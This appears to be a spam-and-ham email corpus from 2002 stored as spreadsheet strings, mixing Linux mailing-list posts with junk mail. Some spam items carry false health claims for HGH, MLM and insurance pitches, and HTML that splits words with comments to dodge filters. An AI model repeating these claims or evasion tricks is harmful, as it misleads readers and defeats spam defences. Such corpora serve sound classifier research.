 $1,000,000... as low as $15.50 per month.
 http://getit.hostserve21.com/sure_quote/LF06-237600/
 Take a moment.
 Let us show you that we are here to save time, and money.
 Receive up to 15 quotes in seconds.
 http://getit.hostserve21.com/sure_quote/LF06-237600/
 Click here to delete your address from future updates.
 http://getit.hostserve21.com/sure_quote/rm/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] C++ and C Mailing Lists for Beginners and Advanced
</t>
  </si>
  <si>
    <t xml:space="preserve">Are there any mailing lists (non-newsgroups) for C++ and C Beginners
 and Advanced programmers?
 Links are welcomed!
 -- 
 Note: When you reply to this message, please include the mailing
       list/newsgroup address and my email address in To:.
 *********************************************************************
 Signed,
 SoloCDM
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Geneticists and a tiny worm win Nobel prize
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8639022,1440/
 Date: Not supplied
 The medicine prize goes to research that revealed how cell suicide sculpts the 
 body and - when disrupted - causes disease
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] re: popular .BIZ and .COM extensions for only $14.95
</t>
  </si>
  <si>
    <t xml:space="preserve">REGISTER .COM, .BIZ, AND .INFO DOMAINS FOR ONLY $14.95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http://www.domainsforeveryone.com/ today for more info.
 Register your domain name today for just $14.95 at: http://www.domainsforeveryone.com/  Registration fees include full access to an easy-to-use control panel to manage your domain name in the future.
 Sincerely,
 Domain Administrator
 Domains For Everyone
 To remove your email address from further promotional mailings from this company, click here:
 http://www.centralremovalservice.com/cgi-bin/domain-remove.cgi
 (g2-ss2)4483ZsiO6-368esUR2641hwjE2-115mHZg9267xWnFl40
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] [ANN] Trained classifier available
</t>
  </si>
  <si>
    <t xml:space="preserve">    http://sf.net/project/showfiles.php?group_id=61702
     This is the binary pickle of my classifier after training on
     my first spam/ham corpora pair.  All records with
     spamprob == UNKNOWN_SPAMPROB have been purged.
 It's in a zip file, and is only half a meg.
 Jeremy, it would be interesting if you tried that on your data.  The false
 negative rates across my other 4 test sets when run against this are:
       0.364%
       0.400%
       0.400%
       0.909%
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Which Muppet Are You?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Apols if this has been posted before:
 &gt; 
 &gt; http://www.pinkpaperclips.net/subs/quiz2.html
 &gt;
 So, anyone who isn't Beaker?
 TimC
 Meep
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 12 Sep 2002, Tom wrote:
 &gt; Yep, that ws the plan all alng with my typos, I am the only one to be
 &gt; consistently fighting the evls of da vore.
 Well, yeah, but there's an easier way.
 	http://www.google.com/search?hl=en&amp;lr=&amp;ie=UTF-8&amp;oe=UTF-8&amp;q=STARTTLS&amp;spell=1
 There's still MITM, but it requires a far higher capability, and is easier
 to detect once you go beyond the scamed interaction of two parties, since
 being manipulative in principle.
 If you run your own mailserver, or have a say in what your host does, make 
 him adopt STARTTLS.
</t>
  </si>
  <si>
    <t xml:space="preserve">Ahh sweet.  Theres a reason for me to upgrade then :-)
 --On Thursday, October 03, 2002 16:20:46 +0300 Panu Matilainen 
 &lt;pmatilai@welho.com&gt; wrote:
 &gt; They want to preserve binary compatibility for all .x releases. Red Hat
 &gt; 8.0 has python 2.2 as default.
                                     -- \m/ --
   "...if I seem super human I have been misunderstood." (c) Dream Theater
          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Man rappels off of city bridge trying to hitch a free ride on a
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8415146,1717/
 Date: 2002-10-01T01:27:10+01:00
 (canada.com)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Oct 07, 2002 at 09:43:11AM +0100, Ciaran Johnston wrote:
 &gt; &gt; Also there's some stuff about French consumer law forbidding sale
 &gt; &gt; without guarantee of anything, so software delivered as-is
 &gt; &gt; breaches consumer law in France. But I didn't really follow that.
 &gt; 
 &gt; My French is a bit iffy these days, but if this is true, does it not also
 &gt; nullify Microsoft, Adobe and WinZip licences amongst most others? These all
 &gt; claim no liability, no guarantees (M$ say delivered "with all faults", so
 &gt; at least they are honest).
 Apparently the angle on this (i.e. selling without guarantee) is that
 software is not a product which is sold but a service which is licensed - at
 least that's what I remember reading about how M$ gets away with providing
 no guarantee in the U.S. If you're feeling rather deep pocketed, you could
 always try suing M$ to get a court's view on the matter.
 Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: * Promote Your E-Business
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=gb2312"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;New Page 1&lt;/title&gt;
 &lt;/head&gt;
 &lt;frameset rows="1,*"&gt;
   &lt;frame name="header" scrolling="no" target="main" noresize marginwidth="1" marginheight="1"&gt;
   &lt;frame name="main" src="http://www.como-verder.com/download/sending.htm" scrolling="auto"&gt;
   &lt;noframes&gt;
   &lt;body&gt;
   &lt;p&gt;This page uses frames, but your browser doesn't support them.&lt;/p&gt;
   &lt;/body&gt;
   &lt;/noframes&gt;
 &lt;/frameset&gt;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</si>
  <si>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sed /s/United States/Roman Empire/g
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri Sep 13 2002 at 17:55, Robert Elz wrote:
 &gt;     Date:        Fri, 13 Sep 2002 11:26:30 +1000
 &gt;     From:        Tony Nugent &lt;tony@linuxworks.com.au&gt;
 &gt;   | I can cut'n'paste from exmh's message display window into spawned
 &gt;   | gvim processes, but not into anything else.
 &gt; 
 &gt; That's odd.  I cut &amp; paste between all kinds of windows (exmh into
 Not so odd, this issue came up several weeks ago (with no real
 resolution).
 &gt; mozilla, xterm, another wish script of mine I use for DNS tasks (but
 &gt; that one I guess is to be expected) netscape (when I used to use it,
 &gt; but I suppose it and mozilla are the same codebase, approx) - in fact
 &gt; I can't thing of anything it fails for, that I have noticed.
 &gt; 
 &gt; What is an example of an "anything else" that it fails for for you?
 Everything else :)  I can't even mark text in an exmh message window
 and then paste it into a terminal window, the cut buffer seems to be
 completely empty (and its previous contents are no longer there
 either).
 &gt; kre
   BTW: talking of spring downunder... I'm in Queensland.  It almost
   feels like early summer already (winters here are dry and warm,
   much better than cold wet miserable Melbourne :-)  Despite some
   recent rain (first in months), we are already into a drought, with
   an El-Nino on the way it is only going to get worse...  (the last
   one in the 90s caused one of the worst droughts ever seen here in
   aussie).
 Cheers
 Tony
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 7 Oct 2002, Jesse Keating wrote:
 &gt; On Mon, 7 Oct 2002 19:28:51 +0200
 &gt; Matthias Saou &lt;matthias@rpmforge.net&gt; wrote:
 &gt; 
 &gt; # I've never heard of any CD-ROM or DVD-ROM drive having problems with
 &gt; # DMA... although there probably is since Red Hat decided to default
 &gt; # disabling it a few releases back :-/
 &gt; 
 &gt; When I worked as a PC repair tech for a Computer store chain, I did
 &gt; run across quite a few DVD drives that would lock up if DMA was
 &gt; enabled.  It's more of a chipset/drive problem than a Drive by itself.
 And my IBM Intellistation would lock up instantly .. now this is actually 
 quite funny .. if DMA was enabled for the CD-ROM *and* you tried to access 
 a CD with Joliet extensions. Otherwise it worked just fine with DMA 
 enabled :)
 -- 
 	- Panu -
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Go-ahead for new-style hospitals
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723999,215/
 Date: 2002-10-10T03:26:52+01:00
 *Society:* Blair brokers Whitehall deal on trusts borrowing private cash.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Your Opportunity at http://iiu.taint.org/pipermail/iiu/2000-November/000608.html
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hello,
 I found your opportunity posted at: 
 http://iiu.taint.org/pipermail/iiu/2000-November/000608.html
 If you want additional places to advertise your opportunity, plus get a free email follow-up system to process your replies, visit:
 http://www.newslist.net
 or just reply to this message.
 Note: You will automatically be removed from this list if you DO NOT reply to this message.  
 Replying will re-subscribe you to our marketing tips newsletter.
 info@newslist.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lose Inches &amp; Pounds With Powerful HGH Product!!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body bgColor="#CCCCCC" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 &lt;div align="center"&gt;Hello, jlnax@yahoo.com&lt;BR&gt;&lt;BR&gt;
 &lt;/div&gt;&lt;div align="center"&gt;&lt;/div&gt;&lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Hum&lt;!--jlnax--&gt;an 
 Gro&lt;!--jlnax--&gt;wth 
 Hor&lt;!--jlnax--&gt;mone 
 Ther&lt;!--jlnax--&gt;apy&lt;/font&gt;
 &lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Lo&lt;!--jlnax--&gt;se 
 wei&lt;!--jlnax--&gt;ght while 
 buil&lt;!--jlnax--&gt;ding 
 le&lt;!--jlnax--&gt;an 
 mus&lt;!--jlnax--&gt;cle 
 mass&lt;br&gt;and 
 rever&lt;!--jlnax--&gt;sing the 
 ravag&lt;!--jlnax--&gt;es of 
 ag&lt;!--jlnax--&gt;ing all at once.&lt;/font&gt;&lt;font face="Arial" size="3"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="3"&gt; &lt;br&gt;Remar&lt;!--jlnax--&gt;kable 
 discov&lt;!--jlnax--&gt;eries about 
 Hum&lt;!--jlnax--&gt;an 
 Gro&lt;!--jlnax--&gt;wth 
 Hormo&lt;!--jlnax--&gt;nes 
 (&lt;b&gt;HG&lt;!--jlnax--&gt;H&lt;/b&gt;) 
 &lt;br&gt;are changing the way we think about ag&lt;!--jlnax--&gt;ing and 
 wei&lt;!--jlnax--&gt;ght 
 lo&lt;!--jlnax--&gt;ss.&lt;/font&gt;&lt;/p&gt;
 &lt;center&gt;&lt;table width="481"&gt;&lt;tr&gt;&lt;td height="2" width="247"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;L&lt;!--jlnax--&gt;ose 
 Wei&lt;!--jlnax--&gt;ght&lt;br&gt;
 Bui&lt;!--jlnax--&gt;ld 
 Mus&lt;!--jlnax--&gt;cle Tone&lt;br&gt;
 Re&lt;!--jlnax--&gt;verse 
 Agi&lt;!--jlnax--&gt;ng&lt;br&gt;
 Increas&lt;!--jlnax--&gt;ed 
 Lib&lt;!--jlnax--&gt;ido&lt;br&gt;
 Dura&lt;!--jlnax--&gt;tion Of 
 Pen&lt;!--jlnax--&gt;ile 
 Erect&lt;!--jlnax--&gt;ion&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;td height="2" width="222"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;
 Healt&lt;!--jlnax--&gt;hier 
 Bon&lt;!--jlnax--&gt;es&lt;br&gt;
 Impr&lt;!--jlnax--&gt;oved 
 Memo&lt;!--jlnax--&gt;ry&lt;br&gt;
 Impr&lt;!--jlnax--&gt;oved skin&lt;br&gt;
 New Hair Gr&lt;!--jlnax--&gt;owth&lt;br&gt;
 Wri&lt;!--jlnax--&gt;nkle 
 Disap&lt;!--jlnax--&gt;pearance &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;/table&gt;&lt;/center&gt;&lt;p align="center"&gt;&lt;a href="http://211.99.37.206:81/ultimatehgh_li/"&gt;&lt;font face="Arial" size="4"&gt;&lt;b&gt;Visit 
 Our Web Si&lt;!--jlnax--&gt;te 
 and Learn The Fa&lt;!--jlnax--&gt;cts: Click Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;&lt;div align="center"&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;BR&gt;
 You are rece&lt;!--jlnax--&gt;iving this email as a 
 subscr&lt;!--jlnax--&gt;iber&lt;br&gt;to the 
 Opt&lt;!--jlnax--&gt;-In 
 Ameri&lt;!--jlnax--&gt;ca 
 Mailin&lt;!--jlnax--&gt;g 
 Lis&lt;!--jlnax--&gt;t. &lt;br&gt;
 To remo&lt;!--jlnax--&gt;ve 
 your&lt;!--jlnax--&gt;self from all related 
 mailli&lt;!--me--&gt;sts,&lt;br&gt;just &lt;a href="http://211.99.37.206:81/ultimatehgh_li/remove.php?userid=jlnax@yahoo.com"&gt;Click Here&lt;/a&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Liam Bedford wrote:
 &gt; that is the CVS version, but it seems that more breakage is to come with the
 &gt; kernel :(
 Limbo seems to be able to compile its own kernel with its own gcc 3.1. 
 That said, I don't want to know what kind of patches Redhat are applying 
 to that kernel. The .spec file alone is 128KBytes! One of the patches is 
 2.4.19-ac10. Redhat don't seem to have patched Limbo's gcc too heavily.
 Paul.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, I've used the check-the-modify-time cache trick for files in
 many places (not just exmh) so some part of me certainly thinks it
 is effective.  However, it occurred to me that if we do checkpoint
 state, then aren't we modifying the sequences file for the current
 folder on every message read?  Perhaps we look at the sequences file
 more than once per message view?  Just idle speculation - we can
 stick in some time calls to find out how expensive things are.
 Someone asked about increasing the time resolution in the exmh log.
 We could make that conditional on some support available in 8.3 -
 Tcl has had "clock seconds" (like gettimeofday) and "clock clicks"
 (high resolution timer) for some time.  But in 8.3 we've calibrated
 clock clicks values to microseconds.  It is still only useful for
 relative times, but each call to Exmh_Log could emit the microsecond
 delta since the last log record.  Of course, we are measuring all
 the overhead of taking the log record, etc.  I'll try it out.
 &gt;&gt;&gt;Chris Garrigues said:
  &gt; &gt; From:  Brent Welch &lt;welch@panasas.com&gt;
  &gt; &gt; Date:  Wed, 28 Aug 2002 10:32:42 -0700
  &gt; &gt;
  &gt; &gt; 
  &gt; &gt; &gt;&gt;&gt;Robert Elz said:
  &gt; &gt;  &gt; Mh_Sequence also goes and rereads the files (.mh_sequences and the
  &gt; &gt;  &gt; context file) but I'm not sure how frequently that one is called.
  &gt; &gt; 
  &gt; &gt; In some places I maintain caches of files by checking their modify
  &gt; time,
  &gt; &gt; but the sequence files are soo small that by the time you stat them to
  &gt; &gt; check their date stamp, you could just read them again.
  &gt; 
  &gt; Do you really think this is true?  I added a modify time check thinking
  &gt; that 
  &gt; it would make an improvement since we were reading it a *lot* more times
  &gt; in 
  &gt; the new code because we're trying to use the sequences.
  &gt; 
  &gt; On the other hand, the sequences files are probably being read out of
  &gt; cache 
  &gt; when that happens anyway.
  &gt; 
  &gt; Even with a small file, I'd think that the time taken to do a 
  &gt; [file mtime $filename] would be worth it.  My code is in proc
  &gt; MhReadSeqs.
  &gt; 
  &gt; Chris
  &gt; 
  &gt; -- 
  &gt; Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
  &gt; virCIO                          http://www.virCIO.Com
  &gt; 716 Congress, Suite 200
  &gt; Austin, TX  78701		+1 512 374 0500
  &gt; 
  &gt;   World War III:  The Wrong-Doers Vs. the Evil-Doers.
  &gt; 
  &gt;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</si>
  <si>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Greetings! 
 You are receiving this letter because you have expressed an interest in receiving information about online business opportunities. If this is erroneous then please accept my most sincere apology. This is a one-time mailing, so no removal is necessary. 
 If you've been burned, betrayed, and back-stabbed by multi-level marketing, MLM, then please read this letter. It could be the most important one that has ever landed in your Inbox. 
 MULTI-LEVEL MARKETING IS A HUGE MISTAKE FOR MOST PEOPLE 
 MLM has failed to deliver on its promises for the past 50 years. The pursuit of the "MLM Dream" has cost hundreds of thousands of people their friends, their fortunes and their sacred honor. 
 The fact is that MLM is fatally flawed, meaning that it CANNOT work for most people. 
 The companies and the few who earn the big money in MLM are NOT going to tell you the real story. FINALLY, there is someone who has the courage to cut through the hype and lies and tell the TRUTH about MLM. 
 HERE'S GOOD NEWS 
 There IS an alternative to MLM that WORKS, and works BIG! If you haven't yet abandoned your dreams, then you need to see this. Earning the kind of income you've dreamed about is easier than you think! 
 With your permission, I'd like to send you a brief letter that will tell you WHY MLM doesn't work for most people and will then introduce you to something so new and refreshing that you'll wonder why you haven't heard of this before. 
 I promise that there will be NO unwanted follow up, NO sales pitch, no one will call you, and your email address will only be used to send you the information. Period. 
 To receive this free, life-changing information, simply click Reply, type "Send Info" in the Subject box and hit Send. I'll get the information to you within 24 hours. Just look for the words MLM WALL OF SHAME in your Inbox. 
 Cordially, 
 Mark R Sherman 
 P.S. Someone recently sent the letter to me and it has been the most eye-opening, financially beneficial information I have ever received. I honestly believe that you will feel the same way once you've read it. And it's FREE! 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: voice applications - how does joe-sixpack build one?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Look at my friend Jonathan's company, VOXEO.  Unless you're going 
 to run out and build a platform that executes Voice XML code and 
 can support IMAP etc. then the easiest way to do this is to 
 leverage VOXEO's service.  You can start building on it for free 
 and you will pay &gt; $0.10 per minute for the pleasure of 
 using/testing the service.
 http://www.voxeo.com
 If you have about $50K to throw at the project then you can look at 
 NUANCE, which has a platform that combines VoiceXML/VXML, Speech 
 Reco, and the L&amp;H speech synthesize, which will allow you to have 
 your email read to you by Stephen Hawking.
 TellMe &amp; BeVocal have off-the-shelf services that do this, though, 
 but from my testing, they suck.
 If I were to build this I'd spec a lightweight IMAP client and 
 VoiceXML browser and dump them on VOXEO.
 However, you'll find this to be extremely slow and frustrating.  
 Better to us a screen phone with a WAP client.
 -Ian.
 On Wednesday, July 17, 2002, at 09:53 PM, Mr. FoRK wrote:
 &gt; I was talking to a friend today about voice applications - using a 
 &gt; phone to
 &gt; get mail or info (other things are possible, but that's what we talked
 &gt; about).
 &gt; He's running a mail server called X-Mail (or something) and it has 
 &gt; a Web UI
 &gt; written with some PHP pages. I made the comment that rending an inbox
 &gt; listing with VoxML (or whatever the latest thing is) would be 
 &gt; trivial &amp; with
 &gt; a little playing around you could do a simple voice app to 
 &gt; monitor &amp; admin
 &gt; the mail server, or you could actually get/send mail this way.
 &gt;
 &gt; The hard part is hooking up to the phone system - how do I get a 
 &gt; phone to
 &gt; hit a 'voice app server' that hits the HTTP+VOX enabled mail server?
 &gt; He'd want to give this back as open source, but there is no 
 &gt; corresponding
 &gt; open source voice server - or is there?
 &gt;
 &gt; I've looked at BeVocal - it seems that Talk2 is toast - does 
 &gt; anybody know
 &gt; how else this could be done?
 &gt;
 &gt; I'd love to see a digital answering machine with some speech 
 &gt; recognition
 &gt; built-in that would proxy into a personal computer for contact 
 &gt; lists &amp; mail
 &gt; &amp; whatnot. I could call /my/ home phone and bounce out to the web or do
 &gt; whatever, without needing a publicly available voice server.
 &gt;
 &gt;
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: "Holiday Season" 2002 begins
</t>
  </si>
  <si>
    <t xml:space="preserve">It's official, the holidays are here.  I got HTML mail from one of the 
 little catalogs I've been known to purchase from....basically the front 
 page of their first holiday catalog. 
 Must have been released simultaneously with mailing for a delivery target 
 of just after Labor Day.
 Ick.
 Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[2]: AA Meetings the Hottest Place to Meet Women With Big Bucks
</t>
  </si>
  <si>
    <t xml:space="preserve">GLM&gt; whereas political brochures are not; the statistics clearly show
 GLM&gt; which is the greater, more senseless, and more preventable killer.
 So outside of the occasional hit by a mafia-boy, where's the killing?
 If you said mind-numbing, rights destroying, cynic-making force, I'd
 agree.  But, does politics really kill?
 I'm bitter atm.  Two reasons mostly:
 1) I was listening to what I heard being the First Amendment
 Foundation? on NPR releasing a poll noting that their
 very-unscientific poll found that half the population thinks the first
 amendment goes too far.   And (their quote was 1 in 5, but I'm finding
 sources of 1 in 4) of the population don't even know what rights are
 guaranteed in the first amendment.
 2) I have a paper due that will make or break my law school career.  I
 hate being a forced sheep.
 baaaa....
 &gt;&gt;&gt;&gt;&gt;&gt; "R" == Russell Turpin &lt;deafbox@hotmail.com&gt; writes:
 GLM&gt;     R&gt; It's difficult to measure which is the greater liability in a
 GLM&gt;     R&gt; potential mate, religiosity or alcoholism.
 GLM&gt;     G&gt; Or politics.
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: xine problems
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 	I'm no longer able to play encrypted dvd's using the xine rpm from freshrpms. 
 I think it was about a week ago when I last rented some dvd's, worked just 
 fine, but apparently since the latest xine update on freshrpms, it won't 
 anymore. 
 The output is :
 input_dvd: Sorry, this plugin doesn't play encrypted DVDs. The legal status
            of CSS decryption is unclear and we can't provide such code.
            Please check http://dvd.sf.net for more information.
 I'm pretty sure it worked with the previous freshrpms release... Any way of 
 rolling back updates ?
 Nick Verhaegen
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Google PR sends a message that they have a new News service.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:8:19:16AM
 Date: Mon, 23 Sep 2002 15:19:16 GMT
 Google PR sends a message that they have a new News service[1]. Maybe I'm slow 
 this morning, or maybe I'm spoiled, but what's the big deal. I thought they 
 already had this. My personal aggregator[2] is better, it shows me what I'm 
 interested in, it's not one size fits all. Help me figure this out. I'm sure 
 there's something innovative here, I just don't see it.
 [1] http://news.google.com/
 [2] http://radio.userland.com/newsAggregator
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ack, apt-get still failing for me, stumped. [RH8]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I posted about this last week, and I'm still stumped.  apt-get is just
 not working for me, and I can't figure out what the problem is.
 I've tried removing the apt rpms, making sure to remove any traces left
 behind (/etc/apt /var/state/apt /var/cache/apt), and still, I get
 "couldn't find package xmms-mp3" when running "apt-get install xmms-mp3".
 Any clues?  Here's a log of a fresh try:
 root@canarsie:/tmp # rpm -e apt apt-devel
 root@canarsie:/tmp # rm -rf /etc/apt /var/cache/apt /var/state/apt
 root@canarsie:/tmp # rpm -ivh apt-0.5.4cnc7-fr1.i386.rpm apt-devel-0.5.4cnc7-fr1.i386.rpm
 warning: apt-0.5.4cnc7-fr1.i386.rpm: V3 DSA signature: NOKEY, key ID
 e42d547b
 Preparing...                ########################################### [100%]
    1:apt                    ########################################### [ 50%]
    2:apt-devel              ########################################### [100%]
 root@canarsie:/tmp # apt-get update
 Ign http://apt.freshrpms.net redhat/8.0/en/i386 release
 Get:1 http://apt.freshrpms.net redhat/8.0/en/i386/os pkglist [1276kB]
 Get:2 http://apt.freshrpms.net redhat/8.0/en/i386/os release [108B]
 Get:3 http://apt.freshrpms.net redhat/8.0/en/i386/updates pkglist [14B]
 Get:4 http://apt.freshrpms.net redhat/8.0/en/i386/updates release [113B]
 Get:5 http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms pkglist
 [57.1kB]
 Get:6 http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms release
 [125B]
 Get:7 http://apt.freshrpms.net redhat/8.0/en/i386/os srclist [152kB]
 Get:8 http://apt.freshrpms.net redhat/8.0/en/i386/updates srclist [14B]
 Get:9 http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms srclist
 [14.4kB]
 Fetched 1500kB in 11s (125kB/s)
 Reading Package Lists... Done
 root@canarsie:/tmp # apt-get install xmms-mp3
 Reading Package Lists... Done
 Building Dependency Tree... Done
 E: Couldn't find package xmms-mp3
 root@canarsie:/tmp # apt-cache search xmms
 root@canarsie:/tmp #
 Beats me..
 -SteveK
 -- 
   Steve Kann - Chief Engineer - 520 8th Ave #2300 NY 10018 -  (212) 533-1775
                 HorizonLive.com - collaborate . interact . learn
    "The box said 'Requires Windows 95, NT, or better,' so I installed Linux."
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New P2P network funded by US government
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8437307,1440/
 Date: Not supplied
 The new network aims to thwart hackers and beat technical problems that make 
 such networks slow or unreliable
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET Cool Gear: Find the right cordless phone
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Cool Gear&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;&lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;&lt;td width=442 colspan=4&gt;
         &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ce/cg/hd.gif" width="442" height="60" border="0" alt="CNET Cool Gear Newsletter"&gt;&lt;br&gt;
         &lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
         	&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 			&lt;/td&gt;&lt;/tr&gt;
             &lt;tr&gt;&lt;td bgcolor="#000000" width=1 rowspan=2&gt;
 				&lt;img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&lt;img src="http://a.r.tv.com/cnet.1d/i/dp/dd_b.gif" width="160" height="18" border="0"&gt;&lt;br&gt;
 &lt;!-- shopping  --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b6-llkUQCKyZLu9jFoT_PUCch20LgRR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/GoDaddy.ban_160x600_domainsgirl3.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /shopping --&gt;
 &lt;br&gt;
 &lt;!-- right column content --&gt;
 &lt;!-- search form --&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;
 	&lt;form method=get action="http://www.search.com/redirect"&gt;
 	&lt;tr valign=top&gt;&lt;td&gt;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value="http://electronics.search.com/search?tag=ex.electronics.dispatch.srch.cnet"&gt;Electronics
  		&lt;option value="http://cnet.search.com/search?tag=ex.electronics.dispatch.srch.cnet"&gt;All CNET
  		&lt;option value="http://www.search.com/search?tag=ex.electronics.dispatch.srch.web"&gt;The Web
 		&lt;/select&gt;&amp;nbsp;
 		&lt;input type=submit value="Go!"&gt;&lt;/font&gt;
 	&lt;/td&gt;&lt;/tr&gt;
 	&lt;/form&gt;
 &lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
 &lt;!-- EDITORS' CHOICE --&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/dp/RHC_EdCHOICE.gif" alt="Editors' Choice" width="150" height="20" border="0"&gt;&lt;br&gt;
 &lt;table width="100%" border=0 cellpadding=3 cellspacing=0&gt;
 	&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 		&lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oq56bCR5_7qeZDozn6f5dR" &gt;Toshiba Pocket PC e310&lt;/a&gt; 
